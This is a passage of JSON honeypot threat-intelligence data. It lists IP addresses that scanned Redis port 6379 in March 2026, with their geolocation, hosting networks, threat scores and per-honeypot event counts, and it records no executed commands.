        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 21,
        "days_active_30d": 11,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-20T14:09:54+00:00",
        "last_seen_30d": "2026-03-30T17:30:50.782000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 15,
        "Suricata": 6
      }
    },
    "117.68.86.5": {
      "attack_count": 46,
      "first_seen": "2026-03-09T23:27:43.000Z",
      "last_seen": "2026-03-29T06:37:38.595Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 140527,
      "as_org": "China Telecom",
      "threat_score": 31.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.5,
        "persistence": 17.5,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 9,
        "days_active_30d": 21,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-09T23:28:52.732000+00:00",
        "last_seen_30d": "2026-03-29T06:37:38.595000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 9
      }
    },
    "47.243.177.131": {
      "attack_count": 40,
      "first_seen": "2026-03-07T23:45:09.000Z",
      "last_seen": "2026-03-07T23:47:25.535Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Hong Kong",
      "country_code": "HK",
      "city": "Hong Kong",
      "asn": 45102,
      "as_org": "Alibaba US Technology Co., Ltd.",
      "threat_score": 5.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 14.8,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.2
      },
      "reputation_metrics": {
        "total_events_30d": 30,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-07T23:45:20+00:00",
        "last_seen_30d": "2026-03-07T23:47:25.535000+00:00",
        "days_since_last_seen": 24
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 28,
        "Suricata": 2
      }
    },
    "14.18.118.84": {
      "attack_count": 37,
      "first_seen": "2026-03-05T22:18:26.000Z",
      "last_seen": "2026-03-30T19:34:11.095Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Guangzhou",
      "asn": 58466,
      "as_org": "CHINANET Guangdong province network",
      "threat_score": 44.2,
      "threat_level": "medium",
      "score_components": {
        "frequency": 12.0,
        "persistence": 21.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 16,
        "days_active_30d": 26,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T22:18:27+00:00",
        "last_seen_30d": "2026-03-30T19:34:11.095000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 12,
        "Suricata": 4
      }
    },
    "23.94.94.191": {
      "attack_count": 36,
      "first_seen": "2026-03-03T10:13:55.000Z",
      "last_seen": "2026-03-07T11:00:30.229Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Marietta",
      "asn": 36352,
      "as_org": "HostPapa",
      "threat_score": 5.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 12.0,
        "persistence": 4.2,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.2
      },
      "reputation_metrics": {
        "total_events_30d": 16,
        "days_active_30d": 5,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T10:13:55+00:00",
        "last_seen_30d": "2026-03-07T11:00:30.229000+00:00",
        "days_since_last_seen": 24
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 12,
        "Suricata": 4
      }
    },
    "119.45.248.246": {
      "attack_count": 35,
      "first_seen": "2026-03-03T08:00:28.000Z",
      "last_seen": "2026-03-14T22:17:13.970Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Nanjing",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 15.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 12.8,
        "persistence": 10.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 19,
        "days_active_30d": 12,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T08:00:29+00:00",
        "last_seen_30d": "2026-03-14T22:17:13.970000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 15,
        "Suricata": 4
      }
    },
    "117.156.219.44": {
      "attack_count": 33,
      "first_seen": "2026-03-24T14:23:32.000Z",
      "last_seen": "2026-03-29T11:31:49.040Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 9808,
      "as_org": "China Mobile Communications Group Co., Ltd.",
      "threat_score": 27.1,
      "threat_level": "low",
      "score_components": {
        "frequency": 12.0,
        "persistence": 5.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 16,
        "days_active_30d": 6,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-24T14:23:33+00:00",
        "last_seen_30d": "2026-03-29T11:31:49.040000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 12,
        "Suricata": 4
      }
    },
    "121.196.225.181": {
      "attack_count": 28,
      "first_seen": "2026-03-11T00:51:17.000Z",
      "last_seen": "2026-03-22T22:56:27.761Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 23.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.8,
        "persistence": 10.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 12,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-11T00:51:17+00:00",
        "last_seen_30d": "2026-03-22T22:56:27.761000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 9,
        "Suricata": 3
      }
    },
    "101.206.108.12": {
      "attack_count": 26,
      "first_seen": "2026-03-05T15:14:23.000Z",
      "last_seen": "2026-03-30T09:07:20.759Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 40.7,
      "threat_level": "medium",
      "score_components": {
        "frequency": 8.5,
        "persistence": 21.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 26,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T15:15:25.199000+00:00",
        "last_seen_30d": "2026-03-30T09:07:20.759000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4,
        "Redishoneypot": 3
      }
    },
    "49.7.204.85": {
      "attack_count": 26,
      "first_seen": "2026-03-12T22:58:49.000Z",
      "last_seen": "2026-03-27T10:25:40.372Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 23724,
      "as_org": "IDC, China Telecommunications Corporation",
      "threat_score": 23.7,
      "threat_level": "low",
      "score_components": {
        "frequency": 7.0,
        "persistence": 13.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 16,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-12T22:59:56.764000+00:00",
        "last_seen_30d": "2026-03-27T10:25:40.372000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 5
      }
    },
    "8.130.138.41": {
      "attack_count": 26,
      "first_seen": "2026-03-12T02:00:27.000Z",
      "last_seen": "2026-03-28T20:28:26.780Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 31.2,
      "threat_level": "low",
      "score_components": {
        "frequency": 8.5,
        "persistence": 14.2,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 17,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-12T02:00:28+00:00",
        "last_seen_30d": "2026-03-28T20:28:26.780000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4,
        "Redishoneypot": 3
      }
    },
    "135.237.124.6": {
      "attack_count": 25,
      "first_seen": "2026-03-05T20:31:07.000Z",
      "last_seen": "2026-03-05T20:33:09.783Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 82.1,
      "threat_level": "critical",
      "score_components": {
        "frequency": 16.9,
        "persistence": 24.2,
        "diversity": 16,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 49,
        "days_active_30d": 29,
        "ports_targeted_30d": 8,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-03T20:56:16+00:00",
        "last_seen_30d": "2026-03-31T20:23:54.315000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 32,
        "Honeytrap": 8,
        "Redishoneypot": 5,
        "Dionaea": 3,
        "Mailoney": 1
      }
    },
    "47.251.13.59": {
      "attack_count": 25,
      "first_seen": "2026-03-07T10:54:29.000Z",
      "last_seen": "2026-03-07T10:56:53.295Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Santa Clara",
      "asn": 45102,
      "as_org": "Alibaba US Technology Co., Ltd.",
      "threat_score": 69.0,
      "threat_level": "high",
      "score_components": {
        "frequency": 17.2,
        "persistence": 24.2,
        "diversity": 10,
        "spread": 20,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 53,
        "days_active_30d": 29,
        "ports_targeted_30d": 5,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T17:15:30.029000+00:00",
        "last_seen_30d": "2026-03-30T19:22:39.258000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "H0neytr4p": 24,
        "Suricata": 20,
        "Redishoneypot": 8,
        "Tanner": 1
      }
    },
    "13.89.125.231": {
      "attack_count": 24,
      "first_seen": "2026-03-29T06:09:37.000Z",
      "last_seen": "2026-03-29T06:11:44.704Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Des Moines",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 73.9,
      "threat_level": "high",
      "score_components": {
        "frequency": 15.7,
        "persistence": 22.5,
        "diversity": 16,
        "spread": 25,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 37,
        "days_active_30d": 27,
        "ports_targeted_30d": 8,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-03T13:55:00.334000+00:00",
        "last_seen_30d": "2026-03-29T16:09:33.848000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 22,
        "Honeytrap": 8,
        "Redishoneypot": 5,
        "Dionaea": 1,
        "Tanner": 1
      }
    },
    "172.202.118.10": {
      "attack_count": 23,
      "first_seen": "2026-03-19T10:31:03.000Z",
      "last_seen": "2026-03-19T10:32:49.736Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Des Moines",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 57.4,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.8,
        "persistence": 20.0,
        "diversity": 14,
        "spread": 15,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 30,
        "days_active_30d": 24,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-05T06:49:53.607000+00:00",
        "last_seen_30d": "2026-03-28T08:43:54.053000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 19,
        "Honeytrap": 6,
        "Redishoneypot": 5
      }
    },
    "159.223.143.157": {
      "attack_count": 22,
      "first_seen": "2026-03-05T06:29:28.000Z",
      "last_seen": "2026-03-05T06:30:39.972Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 8.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 24.3,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.13
      },
      "reputation_metrics": {
        "total_events_30d": 269,
        "days_active_30d": 2,
        "ports_targeted_30d": 16,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-04T13:29:48+00:00",
        "last_seen_30d": "2026-03-05T08:27:23.197000+00:00",
        "days_since_last_seen": 26
      },
      "honeypot_breakdown_30d": {
        "Suricata": 175,
        "Honeytrap": 82,
        "Redishoneypot": 8,
        "Dionaea": 4
      }
    },
    "142.93.2.42": {
      "attack_count": 21,
      "first_seen": "2026-03-30T06:06:22.000Z",
      "last_seen": "2026-03-30T06:07:29.434Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 74.1,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 101916,
        "days_active_30d": 2,
        "ports_targeted_30d": 63641,
        "honeypots_triggered_30d": 13,
        "first_seen_30d": "2026-03-29T11:44:05+00:00",
        "last_seen_30d": "2026-03-30T06:16:50.086000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 92363,
        "Honeytrap": 9513,
        "Cowrie": 8,
        "Dionaea": 8,
        "Miniprint": 8,
        "ConPot": 5,
        "Redishoneypot": 3,
        "Dicompot": 2,
        "ElasticPot": 1,
        "Honeyaml": 1,
        "Ipphoney": 1,
        "Medpot": 1
      }
    },
    "157.245.244.52": {
      "attack_count": 21,
      "first_seen": "2026-03-15T12:20:49.000Z",
      "last_seen": "2026-03-15T12:30:58.741Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 33.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 23.2,
        "persistence": 2.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 209,
        "days_active_30d": 3,
        "ports_targeted_30d": 13,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-13T18:47:53+00:00",
        "last_seen_30d": "2026-03-15T14:47:40.351000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Suricata": 142,
        "Honeytrap": 51,
        "Redishoneypot": 8,
        "ElasticPot": 6,
        "Dionaea": 2
      }
    },
    "118.121.27.103": {
      "attack_count": 20,
      "first_seen": "2026-03-12T08:16:25.000Z",
      "last_seen": "2026-03-30T21:17:23.899Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 27.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 6.0,
        "persistence": 15.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 19,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-12T08:17:34.182000+00:00",
        "last_seen_30d": "2026-03-30T21:17:23.899000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4
      }
    },
    "144.172.98.169": {
      "attack_count": 20,
      "first_seen": "2026-03-08T12:25:22.000Z",
      "last_seen": "2026-03-08T12:26:29.559Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ogden",
      "asn": 14956,
      "as_org": "RouterHosting LLC",
      "threat_score": 14.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 17.8,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 60,
        "days_active_30d": 1,
        "ports_targeted_30d": 11,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-08T12:25:22+00:00",
        "last_seen_30d": "2026-03-08T12:35:32.987000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Suricata": 31,
        "Honeytrap": 12,
        "Cowrie": 7,
        "Redishoneypot": 7,
        "Dionaea": 2,
        "ElasticPot": 1
      }
    },
    "8.140.220.38": {
      "attack_count": 20,
      "first_seen": "2026-03-14T10:07:18.000Z",
      "last_seen": "2026-03-27T00:54:48.499Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 27.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 7.8,
        "persistence": 11.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 6,
        "days_active_30d": 14,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-14T10:08:27.612000+00:00",
        "last_seen_30d": "2026-03-27T00:54:48.499000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 3
      }
    },
    "106.15.64.156": {
      "attack_count": 19,
      "first_seen": "2026-03-13T23:50:35.000Z",
      "last_seen": "2026-03-28T04:18:44.228Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 30.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.0,
        "persistence": 13.3,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 16,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-13T23:50:36+00:00",
        "last_seen_30d": "2026-03-28T04:18:44.228000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "143.244.161.132": {
      "attack_count": 18,
      "first_seen": "2026-03-20T02:26:17.000Z",
      "last_seen": "2026-03-20T02:27:28.086Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 13.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-20T02:26:17+00:00",
        "last_seen_30d": "2026-03-20T02:27:28.086000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 5,
        "Suricata": 2
      }
    },
    "165.22.1.63": {
      "attack_count": 18,
      "first_seen": "2026-03-11T17:20:03.000Z",
      "last_seen": "2026-03-11T17:21:17.298Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 10.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 10.8,
        "persistence": 1.7,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 2,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-10T23:44:34.997000+00:00",
        "last_seen_30d": "2026-03-11T17:21:17.298000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 5,
        "Suricata": 5,
        "Dionaea": 2
      }
    },
    "102.130.127.216": {
      "attack_count": 16,
      "first_seen": "2026-03-14T22:05:41.000Z",
      "last_seen": "2026-03-15T11:01:14.984Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "South Africa",
      "country_code": "ZA",
      "city": null,
      "asn": 328364,
      "as_org": "Host-Africa-AS",
      "threat_score": 10.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 1.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 2,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-14T22:06:49.884000+00:00",
        "last_seen_30d": "2026-03-15T11:01:14.984000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 5,
        "Suricata": 2
      }
    },
    "20.171.32.24": {
      "attack_count": 16,
      "first_seen": "2026-03-08T22:14:58.000Z",
      "last_seen": "2026-03-08T22:18:09.193Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 34.5,
      "threat_level": "low",
      "score_components": {
        "frequency": 11.8,
        "persistence": 15.0,
        "diversity": 10,
        "spread": 15,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 15,
        "days_active_30d": 18,
        "ports_targeted_30d": 5,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-04T00:12:49.236000+00:00",
        "last_seen_30d": "2026-03-21T00:01:03.319000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 9,
        "Honeytrap": 3,
        "Redishoneypot": 3
      }
    },
    "20.65.194.166": {
      "attack_count": 16,
      "first_seen": "2026-03-05T05:16:09.000Z",
      "last_seen": "2026-03-05T05:17:47.516Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "San Antonio",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 44.1,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.0,
        "persistence": 17.5,
        "diversity": 12,
        "spread": 15,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 20,
        "days_active_30d": 21,
        "ports_targeted_30d": 6,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-04T23:26:53.806000+00:00",
        "last_seen_30d": "2026-03-24T04:32:50.253000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 12,
        "Honeytrap": 5,
        "Redishoneypot": 3
      }
    },
    "91.196.152.126": {
      "attack_count": 16,
      "first_seen": "2026-03-02T10:59:12.000Z",
      "last_seen": "2026-03-02T11:00:19.138Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "France",
      "country_code": "FR",
      "city": "Roubaix",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 82.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 22.8,
        "persistence": 25,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 189,
        "days_active_30d": 30,
        "ports_targeted_30d": 60,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T05:04:54.332000+00:00",
        "last_seen_30d": "2026-03-31T22:13:42.109000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 138,
        "Honeytrap": 48,
        "Redishoneypot": 3
      }
    },
    "13.86.116.162": {
      "attack_count": 15,
      "first_seen": "2026-03-19T17:45:18.000Z",
      "last_seen": "2026-03-19T17:48:31.102Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Des Moines",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 72.5,
      "threat_level": "high",
      "score_components": {
        "frequency": 15.8,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 38,
        "days_active_30d": 29,
        "ports_targeted_30d": 10,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T07:01:20.537000+00:00",
        "last_seen_30d": "2026-03-30T12:37:25.175000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 24,
        "Honeytrap": 11,
        "Redishoneypot": 3
      }
    },
    "20.121.46.26": {
      "attack_count": 15,
      "first_seen": "2026-03-21T02:13:50.000Z",
      "last_seen": "2026-03-21T02:17:08.138Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 69.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 17.0,
        "persistence": 22.5,
        "diversity": 18,
        "spread": 20,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 50,
        "days_active_30d": 27,
        "ports_targeted_30d": 9,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T16:10:59.237000+00:00",
        "last_seen_30d": "2026-03-28T07:38:39.053000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 33,
        "Honeytrap": 13,
        "Redishoneypot": 3,
        "Honeyaml": 1
      }
    },
    "20.163.14.238": {
      "attack_count": 15,
      "first_seen": "2026-03-22T10:25:19.000Z",
      "last_seen": "2026-03-22T10:28:28.550Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 44.9,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.4,
        "persistence": 6.7,
        "diversity": 8,
        "spread": 20,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 22,
        "days_active_30d": 8,
        "ports_targeted_30d": 4,
        "honeypots_triggered_30d": 4,
